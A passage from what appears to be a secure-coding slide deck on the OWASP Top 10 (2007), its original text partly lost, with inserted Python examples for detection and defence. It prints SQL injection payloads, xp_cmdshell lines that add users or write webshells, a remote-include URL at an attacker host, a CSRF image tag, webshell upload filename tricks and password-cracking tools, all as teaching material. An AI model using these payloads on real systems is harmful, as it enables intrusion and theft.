    document.location.assign(…), window.navigate(…), document.open(…), window.open(…), eval(…),
    window.execScript(…) ….

(cont.)
  Defence: the script itself must validate or encode the DOM value before passing it to a sink
OWASP Top 10 (2007) - 2: Injection Flaw
  - SQL Injection
  - OS Command Injection
  - Code Injection
  - LDAP Injection
  - XPath Injection
  - ….

SQL Injection
  User input is concatenated into a SQL statement, so the input changes the statement instead of just its values.
  Affects all platforms!
    ASP, .NET, Java, PHP, CGI ………
    MSSQL, MySQL, Oracle, Sybase, DB2, PostgreSQL ……

SQL Injection (cont.)
  (diagram)

Where does the input come from?
  Any value the AP puts into SQL!
    Form fields and URL parameters
    Cookies
    HTTP Headers
SQL dialect differences (what an injector needs to know per database):

  Feature                    MS SQL (T-SQL)   MySQL                          Access          Oracle (PL/SQL)            DB2                      Postgres (PL/pgSQL)
  Concatenate strings        ' '+' '          concat(" ", " ")               " "&" "         ' '||' '                   " "+" "                  ' '||' '
  Null replace               Isnull()         Ifnull()                       Iff(Isnull())   Ifnull() (in practice NVL())   Ifnull()             COALESCE()
  Position                   CHARINDEX        LOCATE()                       InStr()         InStr()                    InStr()                  TEXTPOS()
  Op Sys interaction         xp_cmdshell      select into outfile / dumpfile #date#          utl_file                   import from / export to  Call
  UNION                      Y                Y                              Y               Y                          Y                        Y
  Cast                       Yes              No                             No              No                         Yes                      Yes
  Subselects                 Y                N (4.0) / Y (4.1)              N               Y                          Y                        Y
  Batch Queries              Y                N*                             N               N                          N                        Y
  Default stored procedures  Many             N                              N               Many                       N                        N
  Linking DBs                Y                Y                              N               Y                          Y                        N
SQL Injection techniques
  Bypass Authentication
  Error Based (ASP + MS-SQL)
  Union Based
  Update Based
  Blind
  Batch Queries (MS-SQL)
  Extended Procedure (MS-SQL, Oracle)
Bypass Authentication
  Make the WHERE clause of the login query always true, so a row comes back without a valid password.
  Typical inputs:
    ' or ''='
    ' or 1=1--
    ' or 1=1/*

Why
  Intended query:
    Select * From Account
    Where username='[input]' and password='[input]'
  What actually runs:
    Select * From Account
    Where username='admin' and password='' or 1=1--'
  (the -- turns the rest of the line, including the closing quote, into a comment)
  Demo ….
Error Based (ASP + MS-SQL)
  Force a type-conversion or syntax error so the database writes the value the attacker wants into the error message the page displays.
  Typical inputs:
    @@version>1--
    order by 100--
    (select cast(id as nvarchar(4000))+'|')>1

Why
  Intended query:
    Select * From News Where id=[input id]
  What actually runs:
    Select * From News Where id= 1 and @@version>1--
  (comparing the text @@version with the number 1 fails, and the conversion error quotes the version string)
  Microsoft's SQL Injection guides (Traditional Chinese):
    http://www.microsoft.com/taiwan/sql/SQL_Injection_G1.htm
    http://www.microsoft.com/taiwan/sql/SQL_Injection_G2.htm
Attack Sample

   –        :
                                 --
                   : ' HAVING 1=1--
                   : abcd
   –                      :
       SELECT * FROM tblUser WHERE UserName=‘' HAVING 1=1--'
       AND Password=‘abcd'
   –        :
                              :




                       MS SQL Server
                                        tblUser                115
                 UserID
Attack Sample (cont.)
  –       :
            : ' GROUP BY UserID HAVING 1=1--
            : abcd
  –                    :
      SELECT * FROM tblUser WHERE UserName='' GROUP BY UserID HAVING 1=1--' AND Password='abcd'
  –       :
            : MS SQL Server error message naming column UserName
Attack Sample (cont.)
  –       :
            : ' GROUP BY UserID,UserName,Password,Pri HAVING 1=1--
            : abcd
  –                   :
      SELECT * FROM tblUser WHERE UserName='' GROUP BY UserID,UserName,Password,Pri HAVING 1=1--' AND Password='abcd'
  –       :
Union Based
           SQL
                     :
     id=1 order by 10-- (            order by               )
     id=1 union select 1,2,3,4,5--
     id=1 union select 1,2,3,database(),5--
     id=1 union select 1,2,3,(select top 1 name from master..sysdatabases where dbid=7),5--
     id=1 union select 1,2,3,load_file('/etc/passwd'),5--
Why
Original query:
  Select id,user,message From board
  Where id=[ id]

Injected query:
  Select id,user,message From board
  Where id= 1 Union select 1,2,version()--
Demo ….
Update Based
   SQL
                  :
     ' + @@version + '
     ' + (select name from master..sysdatabases where dbid=7) + '
     ',email=(select … ),' …
Why
Original query:
  Update Member
  Set email='[email]', address='[ ]'
  Where user='[ ]'

Injected query:
  Update Member
  Set email='' + passwd + '', address='[ ]'
  Where user='[ ]'
Blind SQL Injection
   "Blind"
                      "   "   "   "
     SQL
                  :
     id=1 and 1=1
     id=1 and 1=2
     id=1 and (select top 1 ascii(substring(passwd,1,1)) from users)>79
Blind SQL Injection (cont.)
        :
            True

            False
Batch Queries
        ;
       (MS-SQL           )
     Select / Insert / Delete / Update / Drop ….
                        Stored Procedure
                   :
     id=1 ; drop table account;--
     id=1 ; exec master..xp_cmdshell 'net user Hacker Hacker /add';--
                                 …..
Batch Queries (cont.)
       MS-SQL                                  ……!!
                     (MS-SQL)
 xp_cmdshell                          SQL Server
 xp_regXXXX                                  registry
 xp_servicecontrol
 xp_terminate_process                        Process ID
 xp_dirtree
 xp_oaXXXX                                   OLE
                   !
           Query
–                         SQL
    /*
    --
–
    or 1=1--
    or 2>1--
    ' or ''='
–
    and 1=1--
    and 1=2--
    ';declare @a int;--

              (cont.)
–
                                <->     )
    @@version>1
–
    1/0
–
    order by 100
–    union                  query
    ' union select col1,col2,… from table--
–
    ;exec master..xp_cmdshell 'net user Hacker Hacker /add';--
    ;exec master..xp_cmdshell 'echo WEBSHELL > path/a.asp'--
    ;exec master..xp_regread 'HKEY_CURRENT_USER,Software\ORL\WinVNC3',Password;--
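A defender's counterpart to the keyword list above, as an added example that is not part of the original slides: each query-string value in a web server access log is URL-decoded (twice, to catch double encoding) and matched against the signature classes the list names (comment markers, tautologies, probes, UNION, batch and extended procedures). The regexes, the Common Log Format parsing and the sample log lines are constructed for illustration and are not a production ruleset.

```python
import re
from urllib.parse import unquote_plus

# Signature classes drawn from the keyword list on this slide (constructed regexes).
SIGNATURES = [
    ("comment",    re.compile(r"--|/\*")),
    ("tautology",  re.compile(r"\b(?:or|and)\s+\d+\s*(?:=|<|>)+\s*\d+", re.I)),
    ("quote_taut", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I)),
    ("probe",      re.compile(r"@@version|\border\s+by\s+\d+|\b1/0\b", re.I)),
    ("union",      re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("batch",      re.compile(r";\s*(?:exec|declare|drop)\b|\bxp_\w+", re.I)),
]

# Request line inside a Common Log Format record: "METHOD /path?query HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def normalize(value):
    """URL-decode twice (catches %2527-style double encoding) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded)


def scan_query_string(query):
    """Sorted list of signature classes that fire on any parameter value."""
    hits = set()
    for pair in query.split("&"):
        _, _, value = pair.partition("=")
        text = normalize(value)
        for category, rx in SIGNATURES:
            if rx.search(text):
                hits.add(category)
    return sorted(hits)


def scan_access_log(lines):
    """Map 1-based line number -> signature classes, for lines with at least one hit."""
    findings = {}
    for n, line in enumerate(lines, start=1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        _, _, query = m.group(1).partition("?")
        hits = scan_query_string(query)
        if hits:
            findings[n] = hits
    return findings


# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2009:10:00:01 +0800] "GET /news.asp?id=12 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Oct/2009:10:00:02 +0800] "GET /news.asp?id=1+and+1%3D1-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Oct/2009:10:00:03 +0800] "GET /news.asp?id=1%20union%20select%201,2,3-- HTTP/1.1" 500 88',
    '10.0.0.5 - - [01/Oct/2009:10:00:04 +0800] "POST /login.asp?u=admin&p=x%27+or+%27%27%3D%27 HTTP/1.1" 302 0',
    '10.0.0.5 - - [01/Oct/2009:10:00:05 +0800] "GET /news.asp?id=1;declare+@a+int;-- HTTP/1.1" 500 88',
]

if __name__ == "__main__":
    for n, hits in scan_access_log(SAMPLE_LOG).items():
        print(n, hits)
```

Decoding twice means a literal `+` or `%` in a legitimate value may be altered before matching; that is acceptable for a detector that only raises alerts, but the raw value should be kept for the analyst alongside the hit.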
                           !
        Parameterized Queries
SQL                             SQL
      SQL
–
                               (cont.)
        Bad !     SQL Injection !!
...
string userName = ctx.getAuthenticatedUserName();
// Untrusted ItemName.Text is spliced straight into the SQL text
string query = "SELECT * FROM items WHERE owner = '"
              + userName + "' AND itemname = '"
              + ItemName.Text + "'";
sda = new SqlDataAdapter(query, conn);
DataTable dt = new DataTable();
sda.Fill(dt);
...
                                     (cont.)
                    (.NET – C#)                                :

using System.Data;
using System.Data.SqlClient;
using System.Web.Configuration;

string connString =
    WebConfigurationManager.ConnectionStrings["myConn"].ConnectionString;
using (SqlConnection conn = new SqlConnection(connString))
{
    conn.Open();
    // @pid is a placeholder; the value travels separately from the SQL text
    SqlCommand cmd = new SqlCommand(
        "SELECT Count(*) FROM Products WHERE ProdID=@pid", conn);
    SqlParameter prm = new SqlParameter("@pid", SqlDbType.VarChar, 50);
    prm.Value = Request.QueryString["pid"];
    cmd.Parameters.Add(prm);
    int recCount = (int)cmd.ExecuteScalar();
}
                                                                               (cont.)
(ASP)
<%
 Option Explicit
 Dim conn, cmd, recordset, iTableIdValue
 'Create Connection
 Set conn = Server.CreateObject("ADODB.Connection")
 conn.Open "DSN=LOCAL"

 'Create Command
 Set cmd = Server.CreateObject("ADODB.Command")
 With cmd
        .ActiveConnection = conn
        'ADO command text takes the positional "?" marker for a parameter
        .CommandText = "Select * from DataTable where Id = ?"
        'Create the parameter and set its value to 1
        .Parameters.Append .CreateParameter("@Parameter", adInteger, adParamInput, , 1)
 End With
 'Get the information in a RecordSet
 'The Command already carries the connection, so Open takes only cmd
 Set recordset = Server.CreateObject("ADODB.Recordset")
 recordset.Open cmd
 '....
 'Do whatever is needed with the information
 '....
 'Do clean up
 recordset.Close
 conn.Close
 Set recordset = Nothing
 Set cmd = Nothing
 Set conn = Nothing
%>
                                          (cont.)
                          (Java)                          :

String custname = request.getParameter("customerName");
// perform input validation to detect attacks
String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, custname);
ResultSet results = pstmt.executeQuery( );
                               (cont.)
                 (PHP)                      :
    – PDO (PHP Data Objects) (PHP >=5.1)
           using bindParam()

$value = $_GET['name'];   // example input source; the original left $value undefined
$dbh = new PDO(DB_DSN, DB_USER, DB_PASSWORD);
$sql_find_repeat = 'SELECT COUNT(*) FROM `table_name` WHERE `col_name` = ?;';
$sth = $dbh->prepare($sql_find_repeat);
$sth->bindParam(1, $value, PDO::PARAM_STR);   // value is bound, never concatenated
$sth->execute();
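The same contrast the C#, ASP, Java and PHP samples make, as an added Python/sqlite3 example that is not code from the original slides: the Account table and the `' or 1=1--` password from the SQL injection slides are built in an in-memory database, and the concatenated query is run beside the parameterized one so the difference in returned rows is visible. The table rows are constructed; the `?` placeholder plays the role of SqlParameter, ADODB parameters, PreparedStatement and PDO bindParam.

```python
import sqlite3

# Constructed Account table for an in-memory database (not real credentials).
SEED_ROWS = [("admin", "s3cret"), ("alice", "wonderland")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Account (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO Account VALUES (?, ?)", SEED_ROWS)
    return conn


def login_concat(conn, username, password):
    """Vulnerable: user input is spliced into the SQL text (the 'Bad!' pattern)."""
    sql = ("SELECT username FROM Account WHERE username='%s' AND password='%s'"
           % (username, password))
    return sorted(row[0] for row in conn.execute(sql))


def login_param(conn, username, password):
    """Safe: '?' placeholders; the driver passes the values apart from the SQL
    text, so quote characters in them never change the query's structure."""
    sql = "SELECT username FROM Account WHERE username=? AND password=?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def compare(username, password):
    """Rows returned by each style for the same credentials."""
    conn = make_db()
    try:
        return {
            "concatenated": login_concat(conn, username, password),
            "parameterized": login_param(conn, username, password),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    print(compare("alice", "wonderland"))
    print(compare("admin", "' or 1=1--"))   # the password value from the slide above
```

With the injected password the concatenated statement becomes `... AND password='' or 1=1--'`, which is true for every row, while the parameterized statement compares the literal string and matches nothing.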
                                       DB
           sa                            !
MS-SQL :
– sp_addextendedproc sp_addlogin sp_password
  sp_addsrvrolemember xp_cmdshell
  xp_availablemedia xp_dirtree xp_servicecontrol
  xp_subdirs ……
OS Command Injection
   AP

(cont.)

                                  :
             –                       ; | & and newline
             –                 ` (the backtick operator)
                                         API                   OS
                                      cmd.exe                  shell
             – JAVA : Runtime.exec()
             – ASP.NET : Process.Start()
http://msdn.microsoft.com/zh-tw/library/h6ak8zt5(VS.80).aspx
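The separator list and the argument-vector APIs named above (Runtime.exec, Process.Start), as an added Python example that is not from the original slides: an allowlist check for a host name, a metacharacter check, and `subprocess.run` with an argument list so that no shell ever parses the value. The host-name grammar is a simplification assumed for illustration; the runnable demonstration uses the Python interpreter itself as the child process so it works on any platform.

```python
import re
import subprocess
import sys

# Shell metacharacters from the slide (; | & newline) plus backtick and $( ) < >.
SHELL_META = set(";|&\n\r`$()<>")
# Simplified host-name grammar (assumption): label characters only, no leading hyphen
# so the value can never be mistaken for a command-line option.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def contains_shell_metachar(value):
    """True if any character a shell would treat specially is present."""
    return any(ch in SHELL_META for ch in value)


def validate_hostname(value):
    """Allowlist validation: returns the value unchanged, or None if rejected."""
    if contains_shell_metachar(value) or not HOSTNAME_RE.fullmatch(value):
        return None
    return value


def build_lookup_argv(host):
    """Argument vector for a DNS lookup; the host is one argv entry, mirroring
    Runtime.exec(String[]) / Process.Start(file, args) with no shell in between."""
    return ["nslookup", host]


def unsafe_shell_line(host):
    """The vulnerable pattern: a single string handed to cmd.exe or sh -c."""
    return "nslookup " + host


def run_argv(argv):
    """Run without a shell and return stdout; every entry reaches the program verbatim."""
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout.strip()


def echo_argument(value):
    """Demonstration child process: the Python interpreter printing argv[1]."""
    return run_argv([sys.executable, "-c", "import sys; print(sys.argv[1])", value])


def lookup(host_input):
    """Validate first; returns the argv that would be executed, or None."""
    host = validate_hostname(host_input)
    return None if host is None else build_lookup_argv(host)


if __name__ == "__main__":
    print(lookup("www.example.com"))
    print(lookup("example.com;id"))
    print(echo_argument("a;b|c&d"))
```

Both controls are kept: the allowlist rejects input that has no business in a host name, and the argv form guarantees that even a value containing `;` or `|` is delivered to the program as data rather than interpreted by a shell.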
Code Injection
    AP
                       :
     PHP : eval()
     ASP : Execute()
OWASP Top10(2007)-3
Malicious File Execution
Malicious File Execution Sample
          (PHP)
                   :
      – https://www.test.com.tw/main.php?Country=tw
      –
           $country = $_GET['Country'];
           include($country . '.php');
                  :
      –                           "backdoor.php"
      –
           https://www.test.com.tw/main.php?Country=http://www.attacker.com.tw/backdoor
      –

–
–
     "indirect object reference map"
– https://www.test.com.tw/main.aspx?Country=1
–         :
     1   "tw.aspx"
     2 "en.aspx"
     Others    Reject !
     OWASP Top10(2007)-4
Insecure Direct Object Reference
OWASP Top 10 (2007) - 4
   Insecure Direct Object Reference
              Web                  "
          "
     http://www.xxx.com.tw/showPage.aspx?page=main.aspx
              :
      –
      –
      –    …
  Demo    ….

      :
     (       )                 .
          : index value or a reference map
http://www.example.com/application?file=1
        : 1 "function_AddUser.aspx"
     :
                    (   Null byte)
 –                      Decoded
 – Java : java.io.File getCanonicalPath()
 – ASP.NET : System.IO.Path.GetFullPath()
          !
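The two controls above (an index-to-name reference map, and canonicalisation with a null-byte check when a file name must be accepted), as an added Python example that is not from the original slides. The page map reuses the `1 -> tw.aspx`, `2 -> en.aspx` mapping from the Malicious File Execution slide; the content root `/var/www/app/pages` is an assumed value, and `os.path.realpath` stands in for getCanonicalPath / GetFullPath.

```python
import os

# Hypothetical reference map: the client only ever sees the integer key.
PAGE_MAP = {1: "tw.aspx", 2: "en.aspx"}
# Assumed content root for the fallback file-name check.
BASE_DIR = os.path.realpath("/var/www/app/pages")


def resolve_page(page_id):
    """Indirect object reference: map an index to a file name; anything not in
    the map (other numbers, file names, URLs) is rejected with None."""
    try:
        key = int(page_id)
    except (TypeError, ValueError):
        return None
    return PAGE_MAP.get(key)


def safe_path(user_value, base_dir=BASE_DIR):
    """When a file name must be accepted: reject NUL bytes (which truncate the
    path in C-based APIs), canonicalise, and require the result to stay under
    base_dir. Returns the absolute path or None."""
    if "\x00" in user_value:
        return None
    candidate = os.path.realpath(os.path.join(base_dir, user_value))
    if os.path.commonpath([candidate, base_dir]) != base_dir:
        return None
    return candidate


if __name__ == "__main__":
    for value in ("1", "2", "3", "http://www.attacker.com.tw/backdoor"):
        print("page", value, "->", resolve_page(value))
    for value in ("tw.aspx", "../../../etc/passwd", "/etc/passwd", "tw.aspx\x00.jpg"):
        print("path", repr(value), "->", safe_path(value))
```

The map is the primary control: a remote URL or a traversal string never reaches the file system because it is not an integer key. The canonical-path check is the fallback for code paths that still take a name, and it must be applied after decoding, on the resolved path rather than the raw string.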
           (cont.)
For PHP:
  In php.ini
   –        allow_url_fopen   allow_url_include
   –        open_basedir
       :
   – include() include_once()     require()      require_once()
     fopen() imagecreatefromXXX()          file()
     file_get_contents() copy() delete() unlink()
     upload_tmp_dir()     move_uploaded_file() $_FILES
   – system()    eval() passthru() or ` (the backtick operator)
     OWASP Top10(2007)-5
Cross-Site Request Forgery (CSRF)
OWASP Top 10 (2007) - 5
   Cross-Site Request Forgery (CSRF)(XSRF)
                       (     )
How XSRF Works
Alice -> Bank.com : /login.html
Alice -> Bank.com : /auth.aspx?id=Alice&pw=fmd9032
Bank.com -> Alice : Cookie: sessionid=40a4c04de
Alice -> Bank.com : /transfer.aspx?from=Alice&to=Bob&amt=$10000
                    Cookie: sessionid=40a4c04de
Bank.com -> Alice : "Transfer Done !"
How XSRF Works(cont.)
Alice -> Bank.com : /login.html
Alice -> Bank.com : /auth.aspx?id=Alice&pw=fmd9032
Bank.com -> Alice : Cookie: sessionid=41d8u31op
Alice -> Evil.org : /evil.html
Evil.org -> Alice : <IMG SRC=http://bank.com/transfer.aspx?from=Alice&to=Evil&amt=$10000 >
Alice -> Bank.com : /transfer.aspx?from=Alice&to=Evil&amt=$10000
                    Cookie: sessionid=41d8u31op
Bank.com -> Alice : "Transfer Done !"
       GET        (              )
          "      "
General - Request ["name"]
 –        : Query String->Form->Server Variables
GET – Request.QueryString["name"]
POST – Request.Form["name"] ( OK)
        (cont.)
Double confirm
Re-authenticate
Two-factor Authentication
        HTTP    "Referer"                                          !
        CAPTCHA
 –                      : Completely Automated Public Turing test to tell Computers and Humans Apart
    (cont.)
           "Custom Random Token":
–
–    :
                             random token
    session data
                         5
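The "Custom Random Token" scheme on this slide, as an added Python example that is not part of the original deck: the token is generated with `secrets`, kept in server-side session data, embedded as a hidden field in the transfer form, and checked on submission with a constant-time comparison. The session is a plain dict standing in for the server's session store (an assumption), and the form field names follow the XSRF diagram above.

```python
import hmac
import secrets


def issue_csrf_token(session):
    """Create the per-session random token once and keep it server-side."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def render_transfer_form(session):
    """Embed the token as a hidden field; a page on evil.org cannot read it,
    so a forged <IMG SRC=...> or auto-submitted form cannot supply it."""
    token = issue_csrf_token(session)
    return (
        '<form method="POST" action="/transfer.aspx">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}">\n'
        '  <input name="to"><input name="amt"><input type="submit">\n'
        '</form>'
    )


def verify_csrf(session, form):
    """Constant-time comparison of the submitted token with the session's copy."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def handle_transfer(session, method, form):
    """HTTP status the transfer endpoint returns: only POST with a valid token succeeds."""
    if method != "POST":
        return 405          # state changes never on GET (defeats the <IMG SRC=...> trick)
    if not verify_csrf(session, form):
        return 403
    return 200


if __name__ == "__main__":
    alice = {}                     # constructed session store for Alice
    print(render_transfer_form(alice))
    token = issue_csrf_token(alice)
    print(handle_transfer(alice, "POST", {"csrf_token": token, "to": "Bob", "amt": "10000"}))
    print(handle_transfer(alice, "GET", {"to": "Evil", "amt": "10000"}))
    print(handle_transfer(alice, "POST", {"to": "Evil", "amt": "10000"}))
```

The token must be bound to the session, not just unpredictable: a token issued to one session is rejected in another, which is why the check reads the expected value from the server-side session data rather than from another cookie.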
 OWASP Top10(2007)-6
 Information Leakage &
Improper Error Handling
    .NET
(    )
         (cont.)
    Framework
.NET           web.config
<customErrors mode="On|Off|RemoteOnly"
    defaultRedirect="error.html">
  <error statusCode="500" redirect="err500.aspx"/>
  <error statusCode="404" redirect="notHere.aspx"/>
  <error statusCode="403" redirect="notAuthz.aspx"/>
</customErrors>

Java          web.xml
<error-page>
   <exception-type>java.lang.Throwable</exception-type>
    <location>GenericError.jsp</location>
</error-page>

<error-page>
    <error-code>500</error-code>
    <location>err500.jsp</location>
</error-page>
    (cont.)
    Try-Catch Exceptions
–    :
            Log
 OWASP Top10(2007)-7
Broken Authentication &
  Session Management
OWASP Top 10 (2007) - 7
   Broken Authentication and Session
   Management
   Web

test1          issuer_account
     (test2)

(cont.)

(cont.)
    (cont.)
(   test2)
– http://www.test.com.tw/UserDataManagement/UserDataEdit.aspx?access=read
– https://web_ip/index.php?id=john&is_admin=false&menu=basic
    !
                    (cont.)
 cookie
           Cookie
– uid :
– username :
– admin : 0/1/Y/N
– permission :    /
      ! (Cookie Poisoning/Spoofing)
       !

:   ?!

      (cont.)
!!!

      (cont.)
!!!
Authentication
                         (       )
                             /
   – SSL
   – Hash / Encryption

    (cont.)
–
– Re-authentication
–
– SSL
–            ( :by email)
–             : "             ??"
– Send a unique time-limited unguessable single-use
  recovery URL to user's email provided during
  registration.

      (cont.)
Session Management
      Session Token
  –           cookie
          cookie scope (domain & path)
      Cookie       secure flag
  –                              cookie
          URL
                   Referer header / Browsing History
          :                             (         replay)

     (cont.)
Logout( ) !
 –                       session
 –   session token
Limit session lifetime
No concurrent logins !
                                   !
    OWASP Top10(2007)-8
Insecure Cryptographic Storage
OWASP Top 10 (2007) - 8
   Insecure Cryptographic Storage
       Log /
    "             "           Password
   Password : 12345678
Algorithm             Value
Base64                MTIzNDU2Nzg=
DES (13 chars)        aaNN3X.PL2piw
MD5 (32 chars)        25d55ad283aa400af464c76d713c07ad
SHA1 (40 chars)       7c222fb2927d828af22f592134e8932480637c0d
Salted MD5            $1$tsLFcOYh$5ibC1Ui2OPwUvyGUttUFI1
LanMan                0182BD0BD4444BF836077A718CCDF409
NTLM                  259745CB123A52AA2E693AAACCA2DB52
Hashed Password Cracking Process
Hashed Password: 7c222fb2927d828af22f592134e8932480637c0d
Possible candidates, each hashed and compared ("Match ?") against it:
  Plaintext 000001 -> Plaintext 000001's hash
  Plaintext 000002 -> Plaintext 000002's hash
  ….
  Plaintext 999999 -> Plaintext 999999's hash
                              !
        Rainbow Table
                  table-lookup
Rainbow Table Generator
   Winrtgen

Free Rainbow Tables

Password Crackers
   John the Ripper
     http://www.openwall.com/john/
     DES/MD5/Salted MD5/LM
   John The Ripper MPI Patch
     http://bindshell.net/tools/johntheripper
     DES/MD5/Salted MD5/LM/NTLM/…
   Cain & Abel
     http://www.oxid.it/
     LM/NTLM/MD5/SHA1/…
   RainbowCrack
     http://www.antsight.com/zsl/rainbowcrack/
     MD5/SHA1/LM/NTLM/…
   Google
     Reverse MD5
     Reverse SHA1
….
Principles
                                Hash
   –                                  &               key size
   – Hash
                : LM MD5 SHA1
              : MD5 twice, SHA-256
                    hash                            (salt)
              : $1$tsLFcOYh$5ibC1Ui2OPwUvyGUttUFI1
   – Cipher
                : DES Triple DES
              : AES(AES-128, AES-192 and AES-256)
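The "salt" and "SHA-256" principles above, as an added Python example that is not from the original slides: an unsalted MD5 that reproduces the 12345678 digest from the table beside a salted, iterated SHA-256 (PBKDF2, a stronger generalisation of the "MD5 twice" idea) whose output differs on every call and is verified with a constant-time compare. The iteration count and the `algorithm$iterations$salt$digest` storage format are the example's own choices.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 100_000   # work factor chosen for this example; tune to the hardware


def _b64(raw):
    return base64.b64encode(raw).decode("ascii")


def unsalted_md5(password):
    """The weak form listed under 'LM MD5 SHA1': same input, same digest,
    every time, so one table of digests cracks every user at once."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None):
    """Salted, iterated SHA-256 (PBKDF2-HMAC); a fresh 16-byte salt per call
    means equal passwords produce different stored values."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, _b64(salt), _b64(digest))


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_b64, digest_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    computed = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iters))
    return hmac.compare_digest(computed, expected)


if __name__ == "__main__":
    print("md5   :", unsalted_md5("12345678"))
    first = hash_password("12345678")
    second = hash_password("12345678")
    print("salted:", first)
    print("salted:", second)
    print("verify:", verify_password("12345678", first), verify_password("12345679", first))
```

The salt is stored next to the digest in the clear; its job is not secrecy but making each digest unique so that a precomputed table or a rainbow table cannot be reused across accounts, while the iteration count slows each guess.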
     (cont.)
For encryption keys
 –
For configuration store
 –
     .NET : Aspnet_setreg.exe
     (http://support.microsoft.com/default.aspx?scid=329290)
 –
 OWASP Top10(2007)-9
Insecure Communication
OWASP Top 10 (2007) - 9
   Insecure Communication

For Web Connections :
         SSL                                  !
   –
         Password Session ID
   –
   –
   –
               SSL               !
For Infrastructure Elements' Communications:
  e.g.
   – TLS (Transport Layer Security)   IPSec
   OWASP Top10(2007)-10
Failure to Restrict URL Access
OWASP Top 10 (2007) - 10
   Failure to Restrict URL Access
     Web Server
     AP

?

       :
/index.asp
      /
Forceful Browsing
        HTML                                   URL
     adduser/deluser showprofile/editprofile     …
            : .bak .old .tmp *~
                    : .inc .cfg .log .mdb .xls .sql
            : .tar .zip .rar .tgz

Google Hacking

                      …
        +
–            …..
–           No SSL
–
     No/Bad authorization
    Demo     …..

!!!

    :
        URL
              (@Web Server)
–              !
–             !!!!

       (cont.)
                          URL
   –                 (    )
   –                            ?   ?
   –
                     IP
Secure Default
   – Role Based
           (              )
   –           vs.
Other Issues
HTTP Response Splitting
HTTP Response Splitting
   HTTP
      :
          AP
          HTTP         Header
          :
                                        HTTP
     Response          (        )
                                    :
      –       Script
      –
      –

HTTP Response Splitting
       :
                    :

HTTP Response Splitting
            :
        :
–   |
–   &
–   ;
–   $
–   %
–   @ at
–   '
–   "
–   \'
–   \"
–   <>
–   ()
–   +
–   CR      ASCII 0x0d
–   LF      ASCII 0x0a
–   ,
–   \
(                           )
–   0~9
–   /
–   -
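Handling the CR and LF entries in the list above, as an added Python example that is not from the original slides: a vulnerable redirect that concatenates URL-decoded input into the `Location` line beside a header-setting helper that refuses any name or value containing CR, LF or NUL. The redirect handler, the header builder and the sample input are constructed for illustration.

```python
from urllib.parse import unquote


def unsafe_redirect(raw_page):
    """Vulnerable pattern: decoded user input is concatenated into a header line,
    so an encoded CR LF in the input ends the Location header early."""
    return "HTTP/1.1 302 Found\r\nLocation: " + unquote(raw_page) + "\r\n\r\n"


def add_header(headers, name, value):
    """Append (name, value) only if neither contains CR, LF or NUL; returns False
    (and adds nothing) otherwise. This is the check the framework API should do."""
    if any(ch in name or ch in value for ch in ("\r", "\n", "\x00")):
        return False
    headers.append((name, value))
    return True


def safe_redirect(raw_page):
    """Redirect built from a header list; returns None when the value is rejected."""
    headers = []
    if not add_header(headers, "Location", unquote(raw_page)):
        return None
    return ("HTTP/1.1 302 Found\r\n"
            + "".join(f"{n}: {v}\r\n" for n, v in headers)
            + "\r\n")


def header_names(response):
    """Names of the headers in a raw response head (used to show what the client sees)."""
    head = response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]


if __name__ == "__main__":
    crafted = "/home%0d%0aSet-Cookie:%20x=1"     # constructed input with encoded CR LF
    print(header_names(unsafe_redirect(crafted)))  # a second header appears
    print(safe_redirect(crafted))                  # None: rejected
    print(header_names(safe_redirect("/home")))
```

Rejecting the request is preferable to stripping the control characters silently: a value that contains CR or LF after decoding is never a legitimate redirect target, and logging the rejection gives the detection side a signal.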
Parameter Tampering
Parameter Tampering
      URL                                    !!!
    radio button check box   select menu
    hidden value (               ?!)
                 (                 !!!)
    SQL XSS
            (      ?!)
            (      ?!)
                         (                         )
                                       !!!

Input Validation
      Business Logic       !
                               Session
        !
            Session    (          )
  AP
           ….
WebShell   Web

WebShell

FCKeditor ?!
  (http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=5790)
            :
                                   : Apache + PHP
                                     ".htaccess",         :
     AddType application/x-httpd-php .jpg
                  PHP                       .jpg
filename.php.123 ?!
 – Apache
filename.php.jpg ?!
 – Apache                               PHP :
        AddHandler      AddType.
 –                                 '.php'           PHP

             !
– .gif.php (    )
– %2E%70%68%70 ( .php)
– .pHp
–   Web Server               MIME-Type
–                        :
–                :
